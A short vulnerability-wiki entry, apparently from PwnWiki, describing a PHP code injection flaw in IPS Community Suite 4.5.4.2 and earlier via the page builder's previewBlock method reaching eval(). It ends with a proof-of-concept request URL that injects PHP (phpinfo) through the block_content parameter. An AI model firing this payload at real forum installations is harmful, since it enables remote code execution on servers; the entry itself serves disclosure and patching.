免费、自由、人人可编辑的漏洞库--PwnWiki.com
,
Introdução
As versões 4.5.4.2 e inferiores do IPS Community Suite apresentam vulnerabilidades de injeção de código PHP. A vulnerabilidade existe porque o método IPS \ cms \ modules \ front \ pages \ _builder :: previewBlock () permite que conteúdo arbitrário seja passado para IPS \ _Theme :: runProcessFunction () </ code > Método, este método será usado para chamar a função PHP eval () . Isso pode ser usado para injetar e executar código PHP arbitrário. A exploração bem-sucedida desta vulnerabilidade requer uma conta (como um moderador ou administrador) com permissões para gerenciar a barra lateral e habilitar o aplicativo "cms".
POC
http://host/ips/index.php?app=cms&module=pages&controller=builder&do=previewBlock&block_plugin=stats&block_template_use_how=copy&block_plugin_app=core&_sending=block_content&block_content=RCE%0ACONTENT;}}phpinfo();die;/*
免费、自由、人人可编辑的漏洞库
